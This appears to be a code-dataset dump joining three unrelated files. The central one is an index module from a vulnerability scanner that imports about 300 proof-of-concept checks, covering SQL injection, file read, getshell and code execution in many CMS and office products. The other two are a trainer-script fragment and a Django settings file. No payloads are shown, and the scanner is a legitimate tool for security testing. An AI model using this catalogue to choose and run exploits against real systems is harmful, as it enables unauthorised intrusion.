execute_schedule(exp)
if __name__ == "__main__":
tf.logging.set_verbosity(tf.logging.INFO)
tf.app.run()
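# Typical invocation (illustrative; the t2t-trainer console script is the
# usual entry point for this module and the flag values are placeholders):
#   t2t-trainer --problem=translate_ende_wmt32k --model=transformer \
#     --hparams_set=transformer_base --data_dir=~/t2t_data \
#     --output_dir=~/t2t_train/ende --train_steps=250000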
| [
"[email protected]"
]
| |
961b9ef2cec94e3824919a09b259a06ecf7673bc | f96f64b7c509b79dea692371c2cbd20e1bd246c0 | /cms/cmsmain.py | 1ff75e12ee563d3068a7d5b44635ab26f7b22e4a | []
| no_license | helloexp/AngelSword | 51cbf491e52cb7be601b641a632e65fe3ee82b74 | 4a77ba5f86a2ae422eba4b78856dcf2a6bf9b4c9 | refs/heads/master | 2021-01-21T11:03:16.795459 | 2017-08-24T09:14:37 | 2017-08-24T09:14:37 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 21,247 | py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
'''
name: CMS vulnerability PoC library
referer: unknown
author: Lucifer
description: bundles all the CMS vulnerability checks into a single module
'''
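# Orientation note (illustrative, added for clarity): each import below exposes
# a *_BaseVerify class implementing one CMS/product vulnerability check. The
# constructor/entry-point signature lives in the individual cms/... modules,
# not here; a caller is typically expected to do something along the lines of
#   poc = phpstudy_probe_BaseVerify(url); poc.run()
# Treat that call pattern as an assumption based on the project layout rather
# than a guarantee made by this file.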
#autoset vuls
from cms.autoset.autoset_phpmyadmin_unauth import autoset_phpmyadmin_unauth_BaseVerify
#phpstudy vuls
from cms.phpstudy.phpstudy_probe import phpstudy_probe_BaseVerify
from cms.phpstudy.phpstudy_phpmyadmin_defaultpwd import phpstudy_phpmyadmin_defaultpwd_BaseVerify
#Hishop vulns
from cms.Hishop.hishop_productlist_sqli import hishop_productlist_sqli_BaseVerify
#SiteEngine vulns
from cms.siteengine.siteengine_comments_module_sqli import siteengine_comments_module_sqli_BaseVerify
#zfsoft vulns
from cms.zfsoft.zfsoft_service_stryhm_sqli import zfsoft_service_stryhm_sqli_BaseVerify
from cms.zfsoft.zfsoft_database_control import zfsoft_database_control_BaseVerify
from cms.zfsoft.zfsoft_default3_bruteforce import zfsoft_default3_bruteforce_BaseVerify
#ecshop vulns
from cms.ecshop.ecshop_uc_code_sqli import ecshop_uc_code_sqli_BaseVerify
from cms.ecshop.ecshop_flow_orderid_sqli import ecshop_flow_orderid_sqli_BaseVerify
#discuz! vulns
from cms.discuz.discuz_forum_message_ssrf import discuz_forum_message_ssrf_BaseVerify
from cms.discuz.discuz_focus_flashxss import discuz_focus_flashxss_BaseVerify
from cms.discuz.discuz_x25_path_disclosure import discuz_x25_path_disclosure_BaseVerify
from cms.discuz.discuz_plugin_ques_sqli import discuz_plugin_ques_sqli_BaseVerify
#亿邮 vulns
from cms.eyou.eyou_weakpass import eyou_weakpass_BaseVerify
from cms.eyou.eyou_admin_id_sqli import eyou_admin_id_sqli_BaseVerify
from cms.eyou.eyou_resetpw import eyou_resetpw_BaseVerify
from cms.eyou.eyou_user_kw_sqli import eyou_user_kw_sqli_BaseVerify
#金蝶 vulns
from cms.kingdee.kingdee_filedownload import kingdee_filedownload_BaseVerify
from cms.kingdee.kingdee_resin_dir_path_disclosure import kingdee_resin_dir_path_disclosure_BaseVerify
from cms.kingdee.kingdee_conf_disclosure import kingdee_conf_disclosure_BaseVerify
from cms.kingdee.kingdee_logoImgServlet_fileread import kingdee_logoImgServlet_fileread_BaseVerify
#乐语 vulns
from cms.looyu.looyu_down_filedownload import looyu_down_filedownload_BaseVerify
#smartoa vulns
from cms.smartoa.smartoa_multi_filedownload import smartoa_multi_filedownload_BaseVerify
#URP vulns
from cms.urp.urp_query import urp_query_BaseVerify
from cms.urp.urp_query2 import urp_query2_BaseVerify
from cms.urp.urp_ReadJavaScriptServlet_fileread import urp_ReadJavaScriptServlet_fileread_BaseVerify
#PKPMBS vulns
from cms.PKPMBS.pkpmbs_guestbook_sqli import pkpmbs_guestbook_sqli_BaseVerify
from cms.PKPMBS.pkpmbs_addresslist_keyword_sqli import pkpmbs_addresslist_keyword_sqli_BaseVerify
from cms.PKPMBS.pkpmbs_MsgList_sqli import pkpmbs_MsgList_sqli_BaseVerify
#帝友 vulns
from cms.diyou.dyp2p_latesindex_sqli import dyp2p_latesindex_sqli_BaseVerify
from cms.diyou.dyp2p_url_fileread import dyp2p_url_fileread_BaseVerify
#爱琴斯 vulns
from cms.iGenus.igenus_code_exec import igenus_code_exec_BaseVerify
from cms.iGenus.igenus_login_Lang_fileread import igenus_login_Lang_fileread_BaseVerify
from cms.iGenus.igenus_syslogin_Lang_fileread import igenus_syslogin_Lang_fileread_BaseVerify
#live800 vulns
from cms.live800.live800_downlog_filedownload import live800_downlog_filedownload_BaseVerify
from cms.live800.live800_loginAction_sqli import live800_loginAction_sqli_BaseVerify
from cms.live800.live800_sta_export_sqli import live800_sta_export_sqli_BaseVerify
from cms.live800.live800_services_xxe import live800_services_xxe_BaseVerify
#thinkphp vulns
from cms.thinkphp.onethink_category_sqli import onethink_category_sqli_BaseVerify
from cms.thinkphp.thinkphp_code_exec import thinkphp_code_exec_BaseVerify
#汇思 vulns
from cms.wizbank.wizbank_download_filedownload import wizbank_download_filedownload_BaseVerify
from cms.wizbank.wizbank_usr_id_sqli import wizbank_usr_id_sqli_BaseVerify
#汇文 vulns
from cms.libsys.libsys_ajax_asyn_link_old_fileread import libsys_ajax_asyn_link_old_fileread_BaseVerify
from cms.libsys.libsys_ajax_asyn_link_fileread import libsys_ajax_asyn_link_fileread_BaseVerify
from cms.libsys.libsys_ajax_get_file_fileread import libsys_ajax_get_file_fileread_BaseVerify
#通元内容管理系统 vulns
from cms.gpower.gpower_users_disclosure import gpower_users_disclosure_BaseVerify
#metinfo cms vulns
from cms.metinfo.metinfo_getpassword_sqli import metinfo_getpassword_sqli_BaseVerify
from cms.metinfo.metinfo_login_check_sqli import metinfo_login_check_sqli_BaseVerify
#用友 vulns
from cms.yonyou.yonyou_icc_struts2 import yonyou_icc_struts2_BaseVerify
from cms.yonyou.yonyou_user_ids_sqli import yonyou_user_ids_sqli_BaseVerify
from cms.yonyou.yonyou_multi_union_sqli import yonyou_multi_union_sqli_BaseVerify
from cms.yonyou.yonyou_initData_disclosure import yonyou_initData_disclosure_BaseVerify
from cms.yonyou.yonyou_createMysql_disclosure import yonyou_createMysql_disclosure_BaseVerify
from cms.yonyou.yonyou_test_sqli import yonyou_test_sqli_BaseVerify
from cms.yonyou.yonyou_getemaildata_fileread import yonyou_getemaildata_fileread_BaseVerify
from cms.yonyou.yonyou_ehr_ELTextFile import yonyou_ehr_ELTextFile_BaseVerify
from cms.yonyou.yonyou_a8_CmxUser_sqli import yonyou_a8_CmxUser_sqli_BaseVerify
from cms.yonyou.yonyou_cm_info_content_sqli import yonyou_cm_info_content_sqli_BaseVerify
from cms.yonyou.yonyou_a8_personService_xxe import yonyou_a8_personService_xxe_BaseVerify
from cms.yonyou.yonyou_u8_CmxItem_sqli import yonyou_u8_CmxItem_sqli_BaseVerify
from cms.yonyou.yonyou_fe_treeXml_sqli import yonyou_fe_treeXml_sqli_BaseVerify
from cms.yonyou.yonyou_ehr_resetpwd_sqli import yonyou_ehr_resetpwd_sqli_BaseVerify
from cms.yonyou.yonyou_nc_NCFindWeb_fileread import yonyou_nc_NCFindWeb_fileread_BaseVerify
from cms.yonyou.yonyou_a8_logs_disclosure import yonyou_a8_logs_disclosure_BaseVerify
from cms.yonyou.yonyou_status_default_pwd import yonyou_status_default_pwd_BaseVerify
#v2tech vulns
from cms.v2tech.v2Conference_sqli_xxe import v2Conference_sqli_xxe_BaseVerify
#digital campus vulns
from cms.digital_campus.digital_campus_log_disclosure import digital_campus_log_disclosure_BaseVerify
from cms.digital_campus.digital_campus_systemcodelist_sqli import digital_campus_systemcodelist_sqli_BaseVerify
#jeecms vulns
from cms.jeecms.jeecms_fpath_filedownload import jeecms_fpath_filedownload_BaseVerify
#shopex vulns
from cms.shopex.shopex_phpinfo_disclosure import shopex_phpinfo_disclosure_BaseVerify
#FineCMS vulns
from cms.finecms.finecms_uploadfile import finecms_uploadfile_BaseVerify
#hanweb vulns
from cms.hanweb.hanweb_readxml_fileread import hanweb_readxml_fileread_BaseVerify
from cms.hanweb.hanweb_downfile_filedownload import hanweb_downfile_filedownload_BaseVerify
from cms.hanweb.hanweb_VerifyCodeServlet_install import hanweb_VerifyCodeServlet_install_BaseVerify
#php168 vulns
from cms.php168.php168_login_getshell import php168_login_getshell_BaseVerify
#dedecms vulns
from cms.dedecms.dedecms_version import dedecms_version_BaseVerify
from cms.dedecms.dedecms_recommend_sqli import dedecms_recommend_sqli_BaseVerify
from cms.dedecms.dedecms_download_redirect import dedecms_download_redirect_BaseVerify
#umail vulns
from cms.umail.umail_physical_path import umail_physical_path_BaseVerify
from cms.umail.umail_sessionid_access import umail_sessionid_access_BaseVerify
#fsmcms vulns
from cms.fsmcms.fsmcms_p_replydetail_sqli import fsmcms_p_replydetail_sqli_BaseVerify
from cms.fsmcms.fsmcms_setup_reinstall import fsmcms_setup_reinstall_BaseVerify
from cms.fsmcms.fsmcms_columninfo_sqli import fsmcms_columninfo_sqli_BaseVerify
#qibocms vulns
from cms.qibocms.qibocms_search_sqli import qibocms_search_sqli_BaseVerify
from cms.qibocms.qibocms_js_f_id_sqli import qibocms_js_f_id_sqli_BaseVerify
from cms.qibocms.qibocms_s_fids_sqli import qibocms_s_fids_sqli_BaseVerify
from cms.qibocms.qibocms_search_code_exec import qibocms_search_code_exec_BaseVerify
#inspur vulns
from cms.inspur.inspur_multi_sqli import inspur_multi_sqli_BaseVerify
from cms.inspur.inspur_ecgap_displayNewsPic_sqli import inspur_ecgap_displayNewsPic_sqli_BaseVerify
#gobetters vulns
from cms.gobetters.gobetters_multi_sqli import gobetters_multi_sqli_BaseVerify
#lbcms vulns
from cms.lbcms.lbcms_webwsfw_bssh_sqli import lbcms_webwsfw_bssh_sqli_BaseVerify
#dswjcms vulns
from cms.dswjcms.dswjcms_p2p_multi_sqli import dswjcms_p2p_multi_sqli_BaseVerify
#wordpress vulns
from cms.wordpress.wordpress_plugin_azonpop_sqli import wordpress_plugin_azonpop_sqli_BaseVerify
from cms.wordpress.wordpress_plugin_ShortCode_lfi import wordpress_plugin_ShortCode_lfi_BaseVerify
from cms.wordpress.wordpress_url_redirect import wordpress_url_redirect_BaseVerify
from cms.wordpress.wordpress_woocommerce_code_exec import wordpress_woocommerce_code_exec_BaseVerify
from cms.wordpress.wordpress_plugin_mailpress_rce import wordpress_plugin_mailpress_rce_BaseVerify
from cms.wordpress.wordpress_admin_ajax_filedownload import wordpress_admin_ajax_filedownload_BaseVerify
from cms.wordpress.wordpress_restapi_sqli import wordpress_restapi_sqli_BaseVerify
#票友 vulns
from cms.piaoyou.piaoyou_multi_sqli import piaoyou_multi_sqli_BaseVerify
from cms.piaoyou.piaoyou_ten_sqli import piaoyou_ten_sqli_BaseVerify
from cms.piaoyou.piaoyou_six_sqli import piaoyou_six_sqli_BaseVerify
from cms.piaoyou.piaoyou_six2_sqli import piaoyou_six2_sqli_BaseVerify
from cms.piaoyou.piaoyou_int_order_sqli import piaoyou_int_order_sqli_BaseVerify
from cms.piaoyou.piaoyou_newsview_list import piaoyou_newsview_list_BaseVerify
#TCExam vulns
from cms.tcexam.tcexam_reinstall_getshell import tcexam_reinstall_getshell_BaseVerify
#最土团购 vulns
from cms.zuitu.zuitu_coupon_id_sqli import zuitu_coupon_id_sqli_BaseVerify
#iwms vulns
from cms.iwms.iwms_bypass_js_delete import iwms_bypass_js_delete_BaseVerify
#cxplus vulns
from cms.xplus.xplus_2003_getshell import xplus_2003_getshell_BaseVerify
from cms.xplus.xplus_mysql_mssql_sqli import xplus_mysql_mssql_sqli_BaseVerify
#东软uniportal vulns
from cms.uniportal.uniportal_bypass_priv_sqli import uniportal_bypass_priv_sqli_BaseVerify
#pageadmin vulns
from cms.pageadmin.pageadmin_forge_viewstate import pageadmin_forge_viewstate_BaseVerify
#ruvar vulns
from cms.ruvar.ruvar_oa_multi_sqli import ruvar_oa_multi_sqli_BaseVerify
from cms.ruvar.ruvar_oa_multi_sqli2 import ruvar_oa_multi_sqli2_BaseVerify
from cms.ruvar.ruvar_oa_multi_sqli3 import ruvar_oa_multi_sqli3_BaseVerify
#jumboecms vulns
from cms.jumboecms.jumboecms_slide_id_sqli import jumboecms_slide_id_sqli_BaseVerify
#joomla vulns
from cms.joomla.joomla_com_docman_lfi import joomla_com_docman_lfi_BaseVerify
from cms.joomla.joomla_index_list_sqli import joomla_index_list_sqli_BaseVerify
#360shop vulns
from cms.shop360.shop360_do_filedownload import shop360_do_filedownload_BaseVerify
#pstar vulns
from cms.pstar.pstar_warehouse_msg_01_sqli import pstar_warehouse_msg_01_sqli_BaseVerify
from cms.pstar.pstar_isfLclInfo_sqli import pstar_isfLclInfo_sqli_BaseVerify
from cms.pstar.pstar_qcustoms_sqli import pstar_qcustoms_sqli_BaseVerify
#trs vulns
from cms.trs.trs_wcm_pre_as_lfi import trs_wcm_pre_as_lfi_BaseVerify
from cms.trs.trs_inforadar_disclosure import trs_inforadar_disclosure_BaseVerify
from cms.trs.trs_lunwen_papercon_sqli import trs_lunwen_papercon_sqli_BaseVerify
from cms.trs.trs_infogate_xxe import trs_infogate_xxe_BaseVerify
from cms.trs.trs_infogate_register import trs_infogate_register_BaseVerify
from cms.trs.trs_was5_config_disclosure import trs_was5_config_disclosure_BaseVerify
from cms.trs.trs_wcm_default_user import trs_wcm_default_user_BaseVerify
from cms.trs.trs_wcm_infoview_disclosure import trs_wcm_infoview_disclosure_BaseVerify
from cms.trs.trs_was40_passwd_disclosure import trs_was40_passwd_disclosure_BaseVerify
from cms.trs.trs_was40_tree_disclosure import trs_was40_tree_disclosure_BaseVerify
from cms.trs.trs_ids_auth_disclosure import trs_ids_auth_disclosure_BaseVerify
from cms.trs.trs_was5_download_templet import trs_was5_download_templet_BaseVerify
#易创思 vulns
from cms.ecscms.ecscms_MoreIndex_sqli import ecscms_MoreIndex_sqli_BaseVerify
#金窗教务系统 vulns
from cms.gowinsoft_jw.gowinsoft_jw_multi_sqli import gowinsoft_jw_multi_sqli_BaseVerify
#siteserver vulns
from cms.siteserver.siteserver_background_taskLog_sqli import siteserver_background_taskLog_sqli_BaseVerify
from cms.siteserver.siteserver_background_log_sqli import siteserver_background_log_sqli_BaseVerify
from cms.siteserver.siteserver_UserNameCollection_sqli import siteserver_UserNameCollection_sqli_BaseVerify
from cms.siteserver.siteserver_background_keywordsFilting_sqli import siteserver_background_keywordsFilting_sqli_BaseVerify
from cms.siteserver.siteserver_background_administrator_sqli import siteserver_background_administrator_sqli_BaseVerify
#nitc vulns
from cms.nitc.nitc_suggestwordList_sqli import nitc_suggestwordList_sqli_BaseVerify
from cms.nitc.nitc_index_language_id_sqli import nitc_index_language_id_sqli_BaseVerify
#南大之星 vulns
from cms.ndstar.ndstar_six_sqli import ndstar_six_sqli_BaseVerify
#安财软件 vulns
from cms.acsoft.acsoft_GetXMLList_fileread import acsoft_GetXMLList_fileread_BaseVerify
from cms.acsoft.acsoft_GetFile_fileread import acsoft_GetFile_fileread_BaseVerify
from cms.acsoft.acsoft_GetFileContent_fileread import acsoft_GetFileContent_fileread_BaseVerify
#英福金银花ETMV9数字化校园平台
from cms.etmdcp.etmdcp_Load_filedownload import etmdcp_Load_filedownload_BaseVerify
#speedcms vulns
from cms.speedcms.speedcms_list_cid_sqli import speedcms_list_cid_sqli_BaseVerify
#任我行 vulns
from cms.weway.weway_PictureView1_filedownload import weway_PictureView1_filedownload_BaseVerify
#esccms vulns
from cms.esccms.esccms_selectunitmember_unauth import esccms_selectunitmember_unauth_BaseVerify
#wecenter vulns
from cms.wecenter.wecenter_topic_id_sqli import wecenter_topic_id_sqli_BaseVerify
#shopnum1 vulns
from cms.shopnum.shopnum_ShoppingCart1_sqli import shopnum_ShoppingCart1_sqli_BaseVerify
from cms.shopnum.shopnum_ProductListCategory_sqli import shopnum_ProductListCategory_sqli_BaseVerify
from cms.shopnum.shopnum_GuidBuyList_sqli import shopnum_GuidBuyList_sqli_BaseVerify
from cms.shopnum.shopnum_ProductDetail_sqli import shopnum_ProductDetail_sqli_BaseVerify
#fastmeeting vulns
from cms.fastmeeting.fastmeeting_download_filedownload import fastmeeting_download_filedownload_BaseVerify
#远古 vulns
from cms.viewgood.viewgood_two_sqli import viewgood_two_sqli_BaseVerify
from cms.viewgood.viewgood_pic_proxy_sqli import viewgood_pic_proxy_sqli_BaseVerify
from cms.viewgood.viewgood_GetCaption_sqli import viewgood_GetCaption_sqli_BaseVerify
#shop7z vulns
from cms.shop7z.shop7z_order_checknoprint_sqli import shop7z_order_checknoprint_sqli_BaseVerify
#dreamgallery vulns
from cms.dreamgallery.dreamgallery_album_id_sqli import dreamgallery_album_id_sqli_BaseVerify
#kxmail vulns
from cms.kxmail.kxmail_login_server_sqli import kxmail_login_server_sqli_BaseVerify
#shopnc vulns
from cms.shopnc.shopnc_index_class_id_sqli import shopnc_index_class_id_sqli_BaseVerify
#shadowsit vulns
from cms.shadowsit.shadowsit_selector_lfi import shadowsit_selector_lfi_BaseVerify
#phpcms vulns
from cms.phpcms.phpcms_digg_add_sqli import phpcms_digg_add_sqli_BaseVerify
from cms.phpcms.phpcms_authkey_disclosure import phpcms_authkey_disclosure_BaseVerify
from cms.phpcms.phpcms_flash_upload_sqli import phpcms_flash_upload_sqli_BaseVerify
from cms.phpcms.phpcms_product_code_exec import phpcms_product_code_exec_BaseVerify
from cms.phpcms.phpcms_v96_sqli import phpcms_v96_sqli_BaseVerify
from cms.phpcms.phpcms_v961_fileread import phpcms_v961_fileread_BaseVerify
#seacms vulns
from cms.seacms.seacms_search_code_exec import seacms_search_code_exec_BaseVerify
from cms.seacms.seacms_order_code_exec import seacms_order_code_exec_BaseVerify
#cmseasy vulns
from cms.cmseasy.cmseasy_header_detail_sqli import cmseasy_header_detail_sqli_BaseVerify
#phpmyadmin vulns
from cms.phpmyadmin.phpmyadmin_setup_lfi import phpmyadmin_setup_lfi_BaseVerify
#opensns vulns
from cms.opensns.opensns_index_arearank import opensns_index_arearank_BaseVerify
from cms.opensns.opensns_index_getshell import opensns_index_getshell_BaseVerify
#thinksns vulns
from cms.thinksns.thinksns_category_code_exec import thinksns_category_code_exec_BaseVerify
#others vulns
from cms.others.domino_unauth import domino_unauth_BaseVerify
from cms.others.hjsoft_sqli import hjsoft_sqli_BaseVerify
from cms.others.hnkj_researchinfo_dan_sqli import hnkj_researchinfo_dan_sqli_BaseVerify
from cms.others.gpcsoft_ewebeditor_weak import gpcsoft_ewebeditor_weak_BaseVerify
from cms.others.rap_interface_struts_exec import rap_interface_struts_exec_BaseVerify
from cms.others.hongan_dlp_struts_exec import hongan_dlp_struts_exec_BaseVerify
from cms.others.jiuyu_library_struts_exec import jiuyu_library_struts_exec_BaseVerify
from cms.others.yaojie_steel_struts_exec import yaojie_steel_struts_exec_BaseVerify
from cms.others.dkcms_database_disclosure import dkcms_database_disclosure_BaseVerify
from cms.others.damall_selloffer_sqli import damall_selloffer_sqli_BaseVerify
from cms.others.yeu_disclosure_uid import yeu_disclosure_uid_BaseVerify
from cms.others.clib_kinweblistaction_download import clib_kinweblistaction_download_BaseVerify
from cms.others.euse_study_multi_sqli import euse_study_multi_sqli_BaseVerify
from cms.others.suntown_upfile_fileupload import suntown_upfile_fileupload_BaseVerify
from cms.others.skytech_bypass_priv import skytech_bypass_priv_BaseVerify
from cms.others.mallbuilder_change_status_sqli import mallbuilder_change_status_sqli_BaseVerify
from cms.others.efuture_downloadAct_filedownload import efuture_downloadAct_filedownload_BaseVerify
from cms.others.kj65n_monitor_sqli import kj65n_monitor_sqli_BaseVerify
from cms.others.sinda_downloadfile_download import sinda_downloadfile_download_BaseVerify
from cms.others.lianbang_multi_bypass_priv import lianbang_multi_bypass_priv_BaseVerify
from cms.others.star_PostSuggestion_sqli import star_PostSuggestion_sqli_BaseVerify
from cms.others.hezhong_list_id_sqli import hezhong_list_id_sqli_BaseVerify
from cms.others.cicro_DownLoad_filedownload import cicro_DownLoad_filedownload_BaseVerify
from cms.others.huaficms_bypass_js import huaficms_bypass_js_BaseVerify
from cms.others.nongyou_multi_sqli import nongyou_multi_sqli_BaseVerify
from cms.others.zfcgxt_UserSecurityController_getpass import zfcgxt_UserSecurityController_getpass_BaseVerify
from cms.others.mainone_b2b_Default_sqli import mainone_b2b_Default_sqli_BaseVerify
from cms.others.mainone_SupplyList_sqli import mainone_SupplyList_sqli_BaseVerify
from cms.others.workyi_multi_sqli import workyi_multi_sqli_BaseVerify
from cms.others.newedos_multi_sqli import newedos_multi_sqli_BaseVerify
from cms.others.xtcms_download_filedownload import xtcms_download_filedownload_BaseVerify
from cms.others.gn_consulting_sqli import gn_consulting_sqli_BaseVerify
from cms.others.caitong_multi_sqli import caitong_multi_sqli_BaseVerify
from cms.others.anmai_teachingtechnology_sqli import anmai_teachingtechnology_sqli_BaseVerify
from cms.others.alkawebs_viewnews_sqli import alkawebs_viewnews_sqli_BaseVerify
from cms.others.caitong_multi_sleep_sqli import caitong_multi_sleep_sqli_BaseVerify
from cms.others.clib_kindaction_fileread import clib_kindaction_fileread_BaseVerify
from cms.others.mainone_ProductList_sqli import mainone_ProductList_sqli_BaseVerify
from cms.others.eis_menu_left_edit_sqli import eis_menu_left_edit_sqli_BaseVerify
from cms.others.tianbo_Type_List_sqli import tianbo_Type_List_sqli_BaseVerify
from cms.others.tianbo_TCH_list_sqli import tianbo_TCH_list_sqli_BaseVerify
from cms.others.tianbo_Class_Info_sqli import tianbo_Class_Info_sqli_BaseVerify
from cms.others.tianbo_St_Info_sqli import tianbo_St_Info_sqli_BaseVerify
from cms.others.nongyou_Item2_sqli import nongyou_Item2_sqli_BaseVerify
from cms.others.gxwssb_fileDownloadmodel_download import gxwssb_fileDownloadmodel_download_BaseVerify
from cms.others.anmai_grghjl_stuNo_sqli import anmai_grghjl_stuNo_sqli_BaseVerify
from cms.others.nongyou_ShowLand_sqli import nongyou_ShowLand_sqli_BaseVerify
from cms.others.nongyou_sleep_sqli import nongyou_sleep_sqli_BaseVerify
from cms.others.zf_cms_FileDownload import zf_cms_FileDownload_BaseVerify
from cms.others.shiyou_list_keyWords_sqli import shiyou_list_keyWords_sqli_BaseVerify
from cms.others.zhuofan_downLoadFile_download import zhuofan_downLoadFile_download_BaseVerify
from cms.others.gevercms_downLoadFile_filedownload import gevercms_downLoadFile_filedownload_BaseVerify
from cms.others.ips_community_suite_code_exec import ips_community_suite_code_exec_BaseVerify
from cms.others.skytech_geren_list_page_sqli import skytech_geren_list_page_sqli_BaseVerify
from cms.others.xuezi_ceping_unauth import xuezi_ceping_unauth_BaseVerify
from cms.others.haohan_FileDown_filedownload import haohan_FileDown_filedownload_BaseVerify
from cms.others.mingteng_cookie_deception import mingteng_cookie_deception_BaseVerify
from cms.others.jxt1039_unauth import jxt1039_unauth_BaseVerify
# ==== /backend/mobilegeee_28456/settings.py (repo: crowdbotics-apps/mobilegeee-28456, no license) ====
"""
Django settings for mobilegeee_28456 project.
Generated by 'django-admin startproject' using Django 2.2.2.
For more information on this file, see
https://docs.djangoproject.com/en/2.2/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/2.2/ref/settings/
"""
import os
import environ
import logging
env = environ.Env()
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = env.bool("DEBUG", default=False)
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/2.2/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = env.str("SECRET_KEY")
ALLOWED_HOSTS = env.list("HOST", default=["*"])
SITE_ID = 1
SECURE_PROXY_SSL_HEADER = ("HTTP_X_FORWARDED_PROTO", "https")
SECURE_SSL_REDIRECT = env.bool("SECURE_REDIRECT", default=False)
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'django.contrib.sites'
]
LOCAL_APPS = [
'home',
'modules',
'users.apps.UsersConfig',
]
THIRD_PARTY_APPS = [
'rest_framework',
'rest_framework.authtoken',
'rest_auth',
'rest_auth.registration',
'bootstrap4',
'allauth',
'allauth.account',
'allauth.socialaccount',
'allauth.socialaccount.providers.google',
'django_extensions',
'drf_yasg',
'storages',
# start fcm_django push notifications
'fcm_django',
# end fcm_django push notifications
]
INSTALLED_APPS += LOCAL_APPS + THIRD_PARTY_APPS
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'mobilegeee_28456.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [os.path.join(BASE_DIR, 'web_build')],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'mobilegeee_28456.wsgi.application'
# Database
# https://docs.djangoproject.com/en/2.2/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
if env.str("DATABASE_URL", default=None):
DATABASES = {
'default': env.db()
}
# Password validation
# https://docs.djangoproject.com/en/2.2/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/2.2/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/2.2/howto/static-files/
STATIC_URL = '/static/'
MIDDLEWARE += ['whitenoise.middleware.WhiteNoiseMiddleware']
AUTHENTICATION_BACKENDS = (
'django.contrib.auth.backends.ModelBackend',
'allauth.account.auth_backends.AuthenticationBackend'
)
STATIC_ROOT = os.path.join(BASE_DIR, "staticfiles")
STATICFILES_DIRS = [os.path.join(BASE_DIR, 'static'), os.path.join(BASE_DIR, 'web_build/static')]
STATICFILES_STORAGE = 'whitenoise.storage.CompressedManifestStaticFilesStorage'
# allauth / users
ACCOUNT_EMAIL_REQUIRED = True
ACCOUNT_AUTHENTICATION_METHOD = 'email'
ACCOUNT_USERNAME_REQUIRED = False
ACCOUNT_EMAIL_VERIFICATION = "optional"
ACCOUNT_CONFIRM_EMAIL_ON_GET = True
ACCOUNT_LOGIN_ON_EMAIL_CONFIRMATION = True
ACCOUNT_UNIQUE_EMAIL = True
LOGIN_REDIRECT_URL = "users:redirect"
ACCOUNT_ADAPTER = "users.adapters.AccountAdapter"
SOCIALACCOUNT_ADAPTER = "users.adapters.SocialAccountAdapter"
ACCOUNT_ALLOW_REGISTRATION = env.bool("ACCOUNT_ALLOW_REGISTRATION", True)
SOCIALACCOUNT_ALLOW_REGISTRATION = env.bool("SOCIALACCOUNT_ALLOW_REGISTRATION", True)
REST_AUTH_SERIALIZERS = {
# Replace password reset serializer to fix 500 error
"PASSWORD_RESET_SERIALIZER": "home.api.v1.serializers.PasswordSerializer",
}
REST_AUTH_REGISTER_SERIALIZERS = {
# Use custom serializer that has no username and matches web signup
"REGISTER_SERIALIZER": "home.api.v1.serializers.SignupSerializer",
}
# Custom user model
AUTH_USER_MODEL = "users.User"
EMAIL_HOST = env.str("EMAIL_HOST", "smtp.sendgrid.net")
EMAIL_HOST_USER = env.str("SENDGRID_USERNAME", "")
EMAIL_HOST_PASSWORD = env.str("SENDGRID_PASSWORD", "")
EMAIL_PORT = 587
EMAIL_USE_TLS = True
# AWS S3 config
AWS_ACCESS_KEY_ID = env.str("AWS_ACCESS_KEY_ID", "")
AWS_SECRET_ACCESS_KEY = env.str("AWS_SECRET_ACCESS_KEY", "")
AWS_STORAGE_BUCKET_NAME = env.str("AWS_STORAGE_BUCKET_NAME", "")
AWS_STORAGE_REGION = env.str("AWS_STORAGE_REGION", "")
USE_S3 = (
AWS_ACCESS_KEY_ID and
AWS_SECRET_ACCESS_KEY and
AWS_STORAGE_BUCKET_NAME and
AWS_STORAGE_REGION
)
if USE_S3:
AWS_S3_CUSTOM_DOMAIN = env.str("AWS_S3_CUSTOM_DOMAIN", "")
AWS_S3_OBJECT_PARAMETERS = {"CacheControl": "max-age=86400"}
AWS_DEFAULT_ACL = env.str("AWS_DEFAULT_ACL", "public-read")
AWS_MEDIA_LOCATION = env.str("AWS_MEDIA_LOCATION", "media")
AWS_AUTO_CREATE_BUCKET = env.bool("AWS_AUTO_CREATE_BUCKET", True)
DEFAULT_FILE_STORAGE = env.str(
"DEFAULT_FILE_STORAGE", "home.storage_backends.MediaStorage"
)
MEDIA_URL = '/mediafiles/'
MEDIA_ROOT = os.path.join(BASE_DIR, 'mediafiles')
# start fcm_django push notifications
